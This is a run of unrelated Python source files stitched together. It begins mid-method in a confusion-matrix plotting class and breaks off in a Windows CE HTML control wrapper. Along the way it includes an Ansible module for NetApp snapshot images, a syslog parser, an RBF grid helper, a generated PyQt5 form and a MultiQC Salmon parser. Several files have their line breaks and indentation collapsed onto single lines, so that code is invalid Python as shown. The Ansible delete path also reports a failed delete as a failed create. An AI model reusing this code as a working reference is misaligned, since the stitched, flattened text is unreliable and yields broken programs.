            saving it or for use outside of Jupyter notebooks.
        '''
        #Compute the values in case this has not been done yet.
if not self.finished_computation: self.finish() #Setup the plots fig, ax = plt.subplots(1,2, figsize=(15,5.5), sharey=True, sharex=True) #Show the confusion matrices ax[0].imshow(self.confusion_normalized_row*100, interpolation='nearest', cmap=colormap, vmin=0, vmax=100, aspect='auto') im = ax[1].imshow( self.confusion_normalized_col*100, interpolation='nearest', cmap=colormap, vmin=0, vmax=100, aspect='auto') #Make a colorbar cax,kw = mpl.colorbar.make_axes([a for a in ax.flat]) plt.colorbar(im, cax=cax, **kw) ax[0].set_yticks(range(self.class_count)) ax[0].set_xticks(range(self.class_count)) #Possibly add the numbers if number_format is not None: for r in range(0,self.class_count): for c in range(0,self.class_count): ax[0].text(c, r, number_format.format( self.confusion_normalized_row[r,c]), horizontalalignment='center', verticalalignment='center', fontsize=10) ax[1].text(c, r, number_format.format( self.confusion_normalized_col[r,c]), horizontalalignment='center', verticalalignment='center', fontsize=10) # Add the names ax[0].set_yticklabels(self.label_names) ax[0].xaxis.tick_top() ax[0].set_xticklabels(self.label_names, rotation='vertical') ax[1].xaxis.tick_top() ax[1].set_xticklabels(self.label_names, rotation='vertical') # Labels for Row vs Column normalized ax[0].set_title('Row normalized', horizontalalignment='center', y=-0.1) ax[1].set_title( 'Column normalized', horizontalalignment='center', y=-0.1) # A final line showing our three favorite scores. fig.suptitle('Global:{0:.2%}, Average:{1:.2%}, IoU:{2:.2%}'.format( self.global_score, self.avg_score, self.avg_iou_score), fontsize=14, fontweight='bold', x = 0.4, y = 0.03) if only_return_fig: plt.close() return fig def print_confusion_matrix(self, max_name_length=None): '''Print the row normalized confusion matrix in a human readable form. Parameters ---------- max_name_length : int or None (default:None) The maximum number of characters printed for the class names. If left as None the longest class name defines this value. ''' if max_name_length is None: max_name_length = np.max([len(n) for n in self.label_names]) label_names_cropped = [n[:max_name_length] for n in self.label_names] #Compute the values in case this has not been done yet. if not self.finished_computation: self.finish() line = ('{:>' + str(max_name_length) + 's}, ' + ', '.join(['{:>7.2%}'] * self.class_count)) for l, conf in zip(label_names_cropped, self.confusion_normalized_row): print(line.format(l, *(conf.tolist()))) print('Global: {:>7.2%}'.format(self.global_score)) print('Average: {:>7.2%}'.format(self.avg_score)) print('IoU: {:>7.2%}'.format(self.avg_iou_score))
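# Minimal usage sketch for the Confusion class defined above. It assumes the
# class is available in the current session; the labels and predictions are toy
# 2x2 "images" with three classes.
import numpy as np

gt = np.array([[0, 1], [1, 2]])
pred = np.array([[0, 1], [2, 2]])

conf = Confusion(['sky', 'road', 'car'])
conf.incremental_update(gt, pred)   # can be called once per image or per batch
conf.finish()                       # computes global/average/IoU scores
conf.print_confusion_matrix()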
#!/usr/bin/python # (c) 2016, NetApp, Inc # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.0'} DOCUMENTATION = """ --- module: netapp_e_snapshot_images short_description: Create and delete snapshot images description: - Create and delete snapshots images on snapshot groups for NetApp E-series storage arrays. - Only the oldest snapshot image can be deleted so consistency is preserved. - "Related: Snapshot volumes are created from snapshot images." version_added: '2.2' author: Kevin Hulquest (@hulquest) options: api_username: required: true description: - The username to authenticate with the SANtricity WebServices Proxy or embedded REST API. api_password: required: true description: - The password to authenticate with the SANtricity WebServices Proxy or embedded REST API. api_url: required: true description: - The url to the SANtricity WebServices Proxy or embedded REST API. validate_certs: required: false default: true description: - Should https certificates be validated? snapshot_group: description: - The name of the snapshot group in which you want to create a snapshot image. required: True state: description: - Whether a new snapshot image should be created or oldest be deleted. 
required: True choices: ['create', 'remove'] """ EXAMPLES = """ - name: Create Snapshot netapp_e_snapshot_images: ssid: "{{ ssid }}" api_url: "{{ netapp_api_url }}" api_username: "{{ netapp_api_username }}" api_password: "{{ netapp_api_password }}" validate_certs: "{{ validate_certs }}" snapshot_group: "3300000060080E5000299C24000005B656D9F394" state: 'create' """ RETURN = """ --- changed: true msg: "Created snapshot image" image_id: "3400000060080E5000299B640063074057BC5C5E " """ HEADERS = { "Content-Type": "application/json", "Accept": "application/json", } import json from ansible.module_utils.api import basic_auth_argument_spec from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.pycompat24 import get_exception from ansible.module_utils.urls import open_url from ansible.module_utils.six.moves.urllib.error import HTTPError def request(url, data=None, headers=None, method='GET', use_proxy=True, force=False, last_mod_time=None, timeout=10, validate_certs=True, url_username=None, url_password=None, http_agent=None, force_basic_auth=True, ignore_errors=False): try: r = open_url(url=url, data=data, headers=headers, method=method, use_proxy=use_proxy, force=force, last_mod_time=last_mod_time, timeout=timeout, validate_certs=validate_certs, url_username=url_username, url_password=url_password, http_agent=http_agent, force_basic_auth=force_basic_auth) except HTTPError: err = get_exception() r = err.fp try: raw_data = r.read() if raw_data: data = json.loads(raw_data) else: raw_data = None except: if ignore_errors: pass else: raise Exception(raw_data) resp_code = r.getcode() if resp_code >= 400 and not ignore_errors: raise Exception(resp_code, data) else: return resp_code, data def snapshot_group_from_name(module, ssid, api_url, api_pwd, api_usr, name): snap_groups = 'storage-systems/%s/snapshot-groups' % ssid snap_groups_url = api_url + snap_groups (ret, snapshot_groups) = request(snap_groups_url, url_username=api_usr, url_password=api_pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) snapshot_group_id = None for snapshot_group in snapshot_groups: if name == snapshot_group['label']: snapshot_group_id = snapshot_group['pitGroupRef'] break if snapshot_group_id is None: module.fail_json(msg="Failed to lookup snapshot group. Group [%s]. Id [%s]." % (name, ssid)) return snapshot_group def oldest_image(module, ssid, api_url, api_pwd, api_usr, name): get_status = 'storage-systems/%s/snapshot-images' % ssid url = api_url + get_status try: (ret, images) = request(url, url_username=api_usr, url_password=api_pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) except: err = get_exception() module.fail_json(msg="Failed to get snapshot images for group. Group [%s]. Id [%s]. Error [%s]" % (name, ssid, str(err))) if not images: module.exit_json(msg="There are no snapshot images to remove. Group [%s]. Id [%s]." % (name, ssid)) oldest = min(images, key=lambda x: x['pitSequenceNumber']) if oldest is None or "pitRef" not in oldest: module.fail_json(msg="Failed to lookup oldest snapshot group. Group [%s]. Id [%s]." 
% (name, ssid)) return oldest def create_image(module, ssid, api_url, pwd, user, p, snapshot_group): snapshot_group_obj = snapshot_group_from_name(module, ssid, api_url, pwd, user, snapshot_group) snapshot_group_id = snapshot_group_obj['pitGroupRef'] endpoint = 'storage-systems/%s/snapshot-images' % ssid url = api_url + endpoint post_data = json.dumps({'groupId': snapshot_group_id}) image_data = request(url, data=post_data, method='POST', url_username=user, url_password=pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) if image_data[1]['status'] == 'optimal': status = True id = image_data[1]['id'] else: status = False id = '' return status, id def delete_image(module, ssid, api_url, pwd, user, snapshot_group): image = oldest_image(module, ssid, api_url, pwd, user, snapshot_group) image_id = image['pitRef'] endpoint = 'storage-systems/%s/snapshot-images/%s' % (ssid, image_id) url = api_url + endpoint try: (ret, image_data) = request(url, method='DELETE', url_username=user, url_password=pwd, headers=HEADERS, validate_certs=module.params['validate_certs']) except Exception: e = get_exception() image_data = (e[0], e[1]) if ret == 204: deleted_status = True error_message = '' else: deleted_status = False error_message = image_data[1]['errorMessage'] return deleted_status, error_message def main(): argument_spec = basic_auth_argument_spec() argument_spec.update(dict( snapshot_group=dict(required=True, type='str'), ssid=dict(required=True, type='str'), api_url=dict(required=True), api_username=dict(required=False), api_password=dict(required=False, no_log=True), validate_certs=dict(required=False, default=True), state=dict(required=True, choices=['create', 'remove'], type='str'), )) module = AnsibleModule(argument_spec) p = module.params ssid = p.pop('ssid') api_url = p.pop('api_url') user = p.pop('api_username') pwd = p.pop('api_password') snapshot_group = p.pop('snapshot_group') desired_state = p.pop('state') if not api_url.endswith('/'): api_url += '/' if desired_state == 'create': created_status, snapshot_id = create_image(module, ssid, api_url, pwd, user, p, snapshot_group) if created_status: module.exit_json(changed=True, msg='Created snapshot image', image_id=snapshot_id) else: module.fail_json( msg="Could not create snapshot image on system %s, in snapshot group %s" % (ssid, snapshot_group)) else: deleted, error_msg = delete_image(module, ssid, api_url, pwd, user, snapshot_group) if deleted: module.exit_json(changed=True, msg='Deleted snapshot image for snapshot group [%s]' % (snapshot_group)) else: module.fail_json( msg="Could not create snapshot image on system %s, in snapshot group %s --- %s" % ( ssid, snapshot_group, error_msg)) if __name__ == '__main__': main()
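# Standalone illustration of the selection rule used by oldest_image() and
# delete_image() above: only the snapshot image with the smallest
# pitSequenceNumber is eligible for deletion, which is what preserves snapshot
# group consistency. The dictionaries below are toy data, not real API output.
images = [
    {'pitRef': 'img-3', 'pitSequenceNumber': 7},
    {'pitRef': 'img-1', 'pitSequenceNumber': 3},
    {'pitRef': 'img-2', 'pitSequenceNumber': 5},
]
oldest = min(images, key=lambda x: x['pitSequenceNumber'])
assert oldest['pitRef'] == 'img-1'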
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import datetime import arrow import attr import attr.validators from pyparsing import Combine, Literal as L, Word from pyparsing import srange, restOfLine, printables from pyparsing import ParseException from . import Facility, Severity class UnparseableSyslogMessage(Exception): pass class NilValue: pass NilValue = NilValue() SP = L(" ").suppress() LANGLE = L("<").suppress() RANGLE = L(">").suppress() LBRACKET = L("[").suppress() RBRACKET = L("]").suppress() COLON = L(":").suppress() NIL = L("-") NIL.setName("Nil") NIL.setParseAction(lambda s, l, t: NilValue) PRIORITY = LANGLE + Word(srange("[0-9]"), min=1, max=3) + RANGLE # 191 Max PRIORITY = PRIORITY.setResultsName("priority") PRIORITY.setName("Priority") PRIORITY.setParseAction(lambda s, l, t: int(t[0])) TIMESTAMP = Word(printables) TIMESTAMP = TIMESTAMP.setResultsName("timestamp") TIMESTAMP.setName("Timestamp") HOSTNAME = NIL ^ Word(printables) HOSTNAME = HOSTNAME.setResultsName("hostname") HOSTNAME.setName("Hostname") APPNAME = Word("".join(set(printables) - {"["})) APPNAME = APPNAME.setResultsName("appname") APPNAME.setName("AppName") PROCID = Combine(LBRACKET + Word("".join(set(printables) - {"]"})) + RBRACKET) PROCID = PROCID.setResultsName("procid") PROCID.setName("ProcID") HEADER = PRIORITY + TIMESTAMP + SP + HOSTNAME + SP + APPNAME + PROCID MESSAGE = restOfLine.setResultsName("message") MESSAGE.setName("Message") SYSLOG_MESSAGE = HEADER + COLON + SP + MESSAGE SYSLOG_MESSAGE.leaveWhitespace() @attr.s(slots=True, frozen=True) class SyslogMessage: facility = attr.ib( type=Facility, converter=Facility, validator=attr.validators.in_(Facility) ) severity = attr.ib( type=Severity, converter=Severity, validator=attr.validators.in_(Severity) ) timestamp = attr.ib( type=datetime.datetime, converter=lambda t: arrow.get(t).naive, validator=attr.validators.instance_of(datetime.datetime), ) hostname = attr.ib( type=str, validator=attr.validators.instance_of((str, type(None))) ) appname = attr.ib(type=str, validator=attr.validators.instance_of(str)) procid = attr.ib(type=str, validator=attr.validators.instance_of(str)) message = attr.ib(type=str, validator=attr.validators.instance_of(str)) def _value_or_none(value): if value is NilValue: return None else: return value def parse(message): try: parsed = SYSLOG_MESSAGE.parseString(message, parseAll=True) except ParseException as exc: raise UnparseableSyslogMessage(str(exc)) from None data = {} data["facility"] = int(parsed.priority / 8) data["severity"] = parsed.priority - (data["facility"] * 8) data["timestamp"] = parsed.timestamp data["hostname"] = _value_or_none(parsed.hostname) data["appname"] = parsed.appname data["procid"] = parsed.procid data["message"] = parsed.message return SyslogMessage(**data)
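# The <PRI> field parsed above encodes facility and severity as
# priority = facility * 8 + severity, and parse() inverts that split. A small
# standalone check of the arithmetic (165 is the classic local4.notice example):
priority = 165
facility = priority // 8             # 20 -> local4
severity = priority - facility * 8   # 5  -> notice
assert (facility, severity) == (20, 5)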
import numpy as np


def uniform_grid(n_centers, low, high):
    """
    This function is used to create the parameters of uniformly spaced radial
    basis functions with 25% overlap. It creates a uniformly spaced grid of
    ``n_centers[i]`` points between ``low[i]`` and ``high[i]`` for each
    dimension ``i``. It also returns a vector containing the appropriate scales
    of the radial basis functions.

    Args:
         n_centers (list): number of centers of each dimension;
         low (np.ndarray): lowest value for each dimension;
         high (np.ndarray): highest value for each dimension.

    Returns:
        The uniformly spaced grid and the scale vector.

    """
    n_features = len(low)
    b = np.zeros(n_features)
    c = list()
    tot_points = 1
    for i, n in enumerate(n_centers):
        start = low[i]
        end = high[i]

        # Scale parameter and center spacing for this dimension.
        b[i] = (end - start) ** 2 / n ** 3
        m = abs(start - end) / n
        if n == 1:
            c_i = (start + end) / 2.
            c.append(np.array([c_i]))
        else:
            c_i = np.linspace(start - m * .1, end + m * .1, n)
            c.append(c_i)
        tot_points *= n

    n_rows = 1
    n_cols = 0

    grid = np.zeros((tot_points, n_features))

    # Build the cartesian product of the per-dimension center lists, filling the
    # grid one dimension (column) at a time.
    for discrete_values in c:
        i1 = 0
        dim = len(discrete_values)

        for i in range(dim):
            for r in range(n_rows):
                idx_r = r + i * n_rows
                for col in range(n_cols):
                    grid[idx_r, col] = grid[r, col]
                grid[idx_r, n_cols] = discrete_values[i1]

            i1 += 1

        n_cols += 1
        n_rows *= len(discrete_values)

    return grid, b
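# Short usage sketch for uniform_grid() above (it assumes the function is
# available in the current session): 3 centers on the first dimension and 2 on
# the second give a 6 x 2 grid of center coordinates plus one scale per
# dimension.
import numpy as np

centers, scales = uniform_grid([3, 2], np.array([0., -1.]), np.array([1., 1.]))
print(centers.shape)   # (6, 2)
print(scales)          # per-dimension scale vector b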
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file './pyqtgraph/graphicsItems/PlotItem/plotConfigTemplate.ui' # # Created: Wed Mar 26 15:09:28 2014 # by: PyQt5 UI code generator 5.0.1 # # WARNING! All changes made in this file will be lost! from PyQt5 import QtCore, QtGui, QtWidgets class Ui_Form(object): def setupUi(self, Form): Form.setObjectName("Form") Form.resize(481, 840) self.averageGroup = QtWidgets.QGroupBox(Form) self.averageGroup.setGeometry(QtCore.QRect(0, 640, 242, 182)) self.averageGroup.setCheckable(True) self.averageGroup.setChecked(False) self.averageGroup.setObjectName("averageGroup") self.gridLayout_5 = QtWidgets.QGridLayout(self.averageGroup) self.gridLayout_5.setContentsMargins(0, 0, 0, 0) self.gridLayout_5.setSpacing(0) self.gridLayout_5.setObjectName("gridLayout_5") self.avgParamList = QtWidgets.QListWidget(self.averageGroup) self.avgParamList.setObjectName("avgParamList") self.gridLayout_5.addWidget(self.avgParamList, 0, 0, 1, 1) self.decimateGroup = QtWidgets.QFrame(Form) self.decimateGroup.setGeometry(QtCore.QRect(10, 140, 191, 171)) self.decimateGroup.setObjectName("decimateGroup") self.gridLayout_4 = QtWidgets.QGridLayout(self.decimateGroup) self.gridLayout_4.setContentsMargins(0, 0, 0, 0) self.gridLayout_4.setSpacing(0) self.gridLayout_4.setObjectName("gridLayout_4") self.clipToViewCheck = QtWidgets.QCheckBox(self.decimateGroup) self.clipToViewCheck.setObjectName("clipToViewCheck") self.gridLayout_4.addWidget(self.clipToViewCheck, 7, 0, 1, 3) self.maxTracesCheck = QtWidgets.QCheckBox(self.decimateGroup) self.maxTracesCheck.setObjectName("maxTracesCheck") self.gridLayout_4.addWidget(self.maxTracesCheck, 8, 0, 1, 2) self.downsampleCheck = QtWidgets.QCheckBox(self.decimateGroup) self.downsampleCheck.setObjectName("downsampleCheck") self.gridLayout_4.addWidget(self.downsampleCheck, 0, 0, 1, 3) self.peakRadio = QtWidgets.QRadioButton(self.decimateGroup) self.peakRadio.setChecked(True) self.peakRadio.setObjectName("peakRadio") self.gridLayout_4.addWidget(self.peakRadio, 6, 1, 1, 2) self.maxTracesSpin = QtWidgets.QSpinBox(self.decimateGroup) self.maxTracesSpin.setObjectName("maxTracesSpin") self.gridLayout_4.addWidget(self.maxTracesSpin, 8, 2, 1, 1) self.forgetTracesCheck = QtWidgets.QCheckBox(self.decimateGroup) self.forgetTracesCheck.setObjectName("forgetTracesCheck") self.gridLayout_4.addWidget(self.forgetTracesCheck, 9, 0, 1, 3) self.meanRadio = QtWidgets.QRadioButton(self.decimateGroup) self.meanRadio.setObjectName("meanRadio") self.gridLayout_4.addWidget(self.meanRadio, 3, 1, 1, 2) self.subsampleRadio = QtWidgets.QRadioButton(self.decimateGroup) self.subsampleRadio.setObjectName("subsampleRadio") self.gridLayout_4.addWidget(self.subsampleRadio, 2, 1, 1, 2) self.autoDownsampleCheck = QtWidgets.QCheckBox(self.decimateGroup) self.autoDownsampleCheck.setChecked(True) self.autoDownsampleCheck.setObjectName("autoDownsampleCheck") self.gridLayout_4.addWidget(self.autoDownsampleCheck, 1, 2, 1, 1) spacerItem = QtWidgets.QSpacerItem(30, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum) self.gridLayout_4.addItem(spacerItem, 2, 0, 1, 1) self.downsampleSpin = QtWidgets.QSpinBox(self.decimateGroup) self.downsampleSpin.setMinimum(1) self.downsampleSpin.setMaximum(100000) self.downsampleSpin.setProperty("value", 1) self.downsampleSpin.setObjectName("downsampleSpin") self.gridLayout_4.addWidget(self.downsampleSpin, 1, 1, 1, 1) self.transformGroup = QtWidgets.QFrame(Form) self.transformGroup.setGeometry(QtCore.QRect(10, 10, 171, 101)) 
        self.transformGroup.setObjectName("transformGroup")
        self.gridLayout = QtWidgets.QGridLayout(self.transformGroup)
        self.gridLayout.setObjectName("gridLayout")
        self.gridLayout.setContentsMargins(0, 0, 0, 0)
        self.gridLayout.setSpacing(0)
        self.logXCheck = QtWidgets.QCheckBox(self.transformGroup)
        self.logXCheck.setObjectName("logXCheck")
        self.gridLayout.addWidget(self.logXCheck, 1, 0, 1, 1)
        self.fftCheck = QtWidgets.QCheckBox(self.transformGroup)
        self.fftCheck.setObjectName("fftCheck")
        self.gridLayout.addWidget(self.fftCheck, 0, 0, 1, 1)
        self.derivativeCheck = QtWidgets.QCheckBox(self.transformGroup)
        self.derivativeCheck.setObjectName("derivativeCheck")
        self.gridLayout.addWidget(self.derivativeCheck, 3, 0, 1, 1)
        self.phasemapCheck = QtWidgets.QCheckBox(self.transformGroup)
        self.phasemapCheck.setObjectName("phasemapCheck")
        self.gridLayout.addWidget(self.phasemapCheck, 4, 0, 1, 1)
        self.logYCheck = QtWidgets.QCheckBox(self.transformGroup)
        self.logYCheck.setObjectName("logYCheck")
        self.gridLayout.addWidget(self.logYCheck, 2, 0, 1, 1)
        self.pointsGroup = QtWidgets.QGroupBox(Form)
        self.pointsGroup.setGeometry(QtCore.QRect(10, 550, 234, 58))
        self.pointsGroup.setCheckable(True)
        self.pointsGroup.setObjectName("pointsGroup")
        self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.pointsGroup)
        self.verticalLayout_5.setObjectName("verticalLayout_5")
        self.autoPointsCheck = QtWidgets.QCheckBox(self.pointsGroup)
        self.autoPointsCheck.setChecked(True)
        self.autoPointsCheck.setObjectName("autoPointsCheck")
        self.verticalLayout_5.addWidget(self.autoPointsCheck)
        self.gridGroup = QtWidgets.QFrame(Form)
        self.gridGroup.setGeometry(QtCore.QRect(10, 460, 221, 81))
        self.gridGroup.setObjectName("gridGroup")
        self.gridLayout_2 = QtWidgets.QGridLayout(self.gridGroup)
        self.gridLayout_2.setObjectName("gridLayout_2")
        self.xGridCheck = QtWidgets.QCheckBox(self.gridGroup)
        self.xGridCheck.setObjectName("xGridCheck")
        self.gridLayout_2.addWidget(self.xGridCheck, 0, 0, 1, 2)
        self.yGridCheck = QtWidgets.QCheckBox(self.gridGroup)
        self.yGridCheck.setObjectName("yGridCheck")
        self.gridLayout_2.addWidget(self.yGridCheck, 1, 0, 1, 2)
        self.gridAlphaSlider = QtWidgets.QSlider(self.gridGroup)
        self.gridAlphaSlider.setMaximum(255)
        self.gridAlphaSlider.setProperty("value", 128)
        self.gridAlphaSlider.setOrientation(QtCore.Qt.Horizontal)
        self.gridAlphaSlider.setObjectName("gridAlphaSlider")
        self.gridLayout_2.addWidget(self.gridAlphaSlider, 2, 1, 1, 1)
        self.label = QtWidgets.QLabel(self.gridGroup)
        self.label.setObjectName("label")
        self.gridLayout_2.addWidget(self.label, 2, 0, 1, 1)
        self.alphaGroup = QtWidgets.QGroupBox(Form)
        self.alphaGroup.setGeometry(QtCore.QRect(10, 390, 234, 60))
        self.alphaGroup.setCheckable(True)
        self.alphaGroup.setObjectName("alphaGroup")
        self.horizontalLayout = QtWidgets.QHBoxLayout(self.alphaGroup)
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.autoAlphaCheck = QtWidgets.QCheckBox(self.alphaGroup)
        self.autoAlphaCheck.setChecked(False)
        self.autoAlphaCheck.setObjectName("autoAlphaCheck")
        self.horizontalLayout.addWidget(self.autoAlphaCheck)
        self.alphaSlider = QtWidgets.QSlider(self.alphaGroup)
        self.alphaSlider.setMaximum(1000)
        self.alphaSlider.setProperty("value", 1000)
        self.alphaSlider.setOrientation(QtCore.Qt.Horizontal)
        self.alphaSlider.setObjectName("alphaSlider")
        self.horizontalLayout.addWidget(self.alphaSlider)

        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)

    def retranslateUi(self, Form):
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "PyQtGraph"))
self.averageGroup.setToolTip(_translate("Form", "Display averages of the curves displayed in this plot. The parameter list allows you to choose parameters to average over (if any are available).")) self.averageGroup.setTitle(_translate("Form", "Average")) self.clipToViewCheck.setToolTip(_translate("Form", "Plot only the portion of each curve that is visible. This assumes X values are uniformly spaced.")) self.clipToViewCheck.setText(_translate("Form", "Clip to View")) self.maxTracesCheck.setToolTip(_translate("Form", "If multiple curves are displayed in this plot, check this box to limit the number of traces that are displayed.")) self.maxTracesCheck.setText(_translate("Form", "Max Traces:")) self.downsampleCheck.setText(_translate("Form", "Downsample")) self.peakRadio.setToolTip(_translate("Form", "Downsample by drawing a saw wave that follows the min and max of the original data. This method produces the best visual representation of the data but is slower.")) self.peakRadio.setText(_translate("Form", "Peak")) self.maxTracesSpin.setToolTip(_translate("Form", "If multiple curves are displayed in this plot, check \"Max Traces\" and set this value to limit the number of traces that are displayed.")) self.forgetTracesCheck.setToolTip(_translate("Form", "If MaxTraces is checked, remove curves from memory after they are hidden (saves memory, but traces can not be un-hidden).")) self.forgetTracesCheck.setText(_translate("Form", "Forget hidden traces")) self.meanRadio.setToolTip(_translate("Form", "Downsample by taking the mean of N samples.")) self.meanRadio.setText(_translate("Form", "Mean")) self.subsampleRadio.setToolTip(_translate("Form", "Downsample by taking the first of N samples. This method is fastest and least accurate.")) self.subsampleRadio.setText(_translate("Form", "Subsample")) self.autoDownsampleCheck.setToolTip(_translate("Form", "Automatically downsample data based on the visible range. This assumes X values are uniformly spaced.")) self.autoDownsampleCheck.setText(_translate("Form", "Auto")) self.downsampleSpin.setToolTip(_translate("Form", "Downsample data before plotting. (plot every Nth sample)")) self.downsampleSpin.setSuffix(_translate("Form", "x")) self.logXCheck.setText(_translate("Form", "Log X", None)) self.fftCheck.setText(_translate("Form", "Power Spectrum (FFT)", None)) self.derivativeCheck.setText(_translate("Form", "dy/dx", None)) self.phasemapCheck.setText(_translate("Form", "Y vs. Y\'", None)) self.logYCheck.setText(_translate("Form", "Log Y")) self.pointsGroup.setTitle(_translate("Form", "Points")) self.autoPointsCheck.setText(_translate("Form", "Auto")) self.xGridCheck.setText(_translate("Form", "Show X Grid")) self.yGridCheck.setText(_translate("Form", "Show Y Grid")) self.label.setText(_translate("Form", "Opacity")) self.alphaGroup.setTitle(_translate("Form", "Alpha")) self.autoAlphaCheck.setText(_translate("Form", "Auto"))
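# Minimal sketch of the usual pattern for instantiating a pyuic-generated class
# such as Ui_Form above; it assumes Ui_Form is available in the current session,
# plus a PyQt5 installation and a display to show the widget on.
import sys
from PyQt5 import QtWidgets

app = QtWidgets.QApplication(sys.argv)
form = QtWidgets.QWidget()
ui = Ui_Form()
ui.setupUi(form)
form.show()
# app.exec_()  # uncomment to start the Qt event loop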
#!/usr/bin/env python """ MultiQC module to parse output from Salmon """ from __future__ import print_function from collections import OrderedDict import json import logging import os from multiqc.plots import linegraph from multiqc.modules.base_module import BaseMultiqcModule # Initialise the logger log = logging.getLogger(__name__) class MultiqcModule(BaseMultiqcModule): def __init__(self): # Initialise the parent object super(MultiqcModule, self).__init__( name="Salmon", anchor="salmon", href="http://combine-lab.github.io/salmon/", info="is a tool for quantifying the expression of transcripts using RNA-seq data.", ) # Parse meta information. JSON win! self.salmon_meta = dict() for f in self.find_log_files("salmon/meta"): # Get the s_name from the parent directory s_name = os.path.basename(os.path.dirname(f["root"])) s_name = self.clean_s_name(s_name, f) self.salmon_meta[s_name] = json.loads(f["f"]) # Parse Fragment Length Distribution logs self.salmon_fld = dict() for f in self.find_log_files("salmon/fld"): # Get the s_name from the parent directory if os.path.basename(f["root"]) == "libParams": s_name = os.path.basename(os.path.dirname(f["root"])) s_name = self.clean_s_name(s_name, f) parsed = OrderedDict() for i, v in enumerate(f["f"].split()): parsed[i] = float(v) if len(parsed) > 0: if s_name in self.salmon_fld: log.debug("Duplicate sample name found! Overwriting: {}".format(s_name)) self.add_data_source(f, s_name) self.salmon_fld[s_name] = parsed # Filter to strip out ignored sample names self.salmon_meta = self.ignore_samples(self.salmon_meta) self.salmon_fld = self.ignore_samples(self.salmon_fld) if len(self.salmon_meta) == 0 and len(self.salmon_fld) == 0: raise UserWarning if len(self.salmon_meta) > 0: log.info("Found {} meta reports".format(len(self.salmon_meta))) self.write_data_file(self.salmon_meta, "multiqc_salmon") if len(self.salmon_fld) > 0: log.info("Found {} fragment length distributions".format(len(self.salmon_fld))) # Add alignment rate to the general stats table headers = OrderedDict() headers["percent_mapped"] = { "title": "% Aligned", "description": "% Mapped reads", "max": 100, "min": 0, "suffix": "%", "scale": "YlGn", } headers["num_mapped"] = { "title": "M Aligned", "description": "Mapped reads (millions)", "min": 0, "scale": "PuRd", "modify": lambda x: float(x) / 1000000, "shared_key": "read_count", } self.general_stats_addcols(self.salmon_meta, headers) if len(self.salmon_fld) > 0: # Fragment length distribution plot pconfig = { "smooth_points": 500, "id": "salmon_plot", "title": "Salmon: Fragment Length Distribution", "ylab": "Fraction", "xlab": "Fragment Length (bp)", "ymin": 0, "xmin": 0, "tt_label": "<b>{point.x:,.0f} bp</b>: {point.y:,.0f}", } self.add_section(plot=linegraph.plot(self.salmon_fld, pconfig))
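# Standalone sketch of how the module above turns a fragment length
# distribution file (whitespace-separated counts) into the {bin_index: value}
# mapping that is plotted; the string here is toy data, not real Salmon output.
from collections import OrderedDict

raw = "0 0 3 10 42 10 3 0"
parsed = OrderedDict((i, float(v)) for i, v in enumerate(raw.split()))
print(list(parsed.items())[:4])   # [(0, 0.0), (1, 0.0), (2, 3.0), (3, 10.0)]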
## Copyright (c) Alexandre Delattre 2008 ## Permission is hereby granted, free of charge, to any person obtaining ## a copy of this software and associated documentation files (the ## "Software"), to deal in the Software without restriction, including ## without limitation the rights to use, copy, modify, merge, publish, ## distribute, sublicense, and/or sell copies of the Software, and to ## permit persons to whom the Software is furnished to do so, subject to ## the following conditions: ## The above copyright notice and this permission notice shall be ## included in all copies or substantial portions of the Software. ## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, ## EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF ## MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND ## NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE ## LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION ## OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION ## WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE from core import * from ctypes import cdll, Structure, Union DTM_ADDTEXTW = WM_USER+102 DTM_ENDOFSOURCE = WM_USER + 104 DTM_NAVIGATE = WM_USER + 120 DTM_ZOOMLEVEL = WM_USER + 116 DTM_CLEAR = WM_USER + 113 DTM_ENABLESHRINK = WM_USER + 107 DTM_ENABLECONTEXTMENU = WM_USER + 110 class _U_NM_HTMLVIEW(Union): _fields_ = [('dwCookie', DWORD), ('dwFlags', DWORD) ] class NM_HTMLVIEW(Structure): _fields_ = [('hdr', NMHDR), ('szTarget', LPCTSTR), ('szData', LPCTSTR), ('_u', _U_NM_HTMLVIEW), ('szExInfo', LPCTSTR), ] _anonymous_ = ('_u',) NM_BEFORENAVIGATE = WM_USER + 109 class BeforeNavigateEvent(NotificationEvent): def __init__(self, hwnd, nmsg, wparam, lparam): NotificationEvent.__init__(self, hwnd, nmsg, wparam, lparam) nmhtml = NM_HTMLVIEW.from_address(lparam) self._url = nmhtml.szTarget def get_url(self): return self._url class Html(Control): _w32_window_class = "DISPLAYCLASS" _dispatchers = {"navigate" : (NTFEventDispatcher, NM_BEFORENAVIGATE, BeforeNavigateEvent) } _dispatchers.update(Control._dispatchers) def _addtext(self, txt, plain=False): 